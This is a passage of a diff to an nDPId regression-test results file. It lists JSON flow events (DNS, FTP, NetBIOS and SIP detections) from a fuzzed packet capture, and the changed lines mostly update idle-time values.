00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1360,28 +1360,28 @@ 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1120471107427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471107427,"pkt":"ADBUADRWAODtAW69CABFAABIbJIAAIARSuLAqAECwKgBAQsQADUANDd+8jYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00827{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00827{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 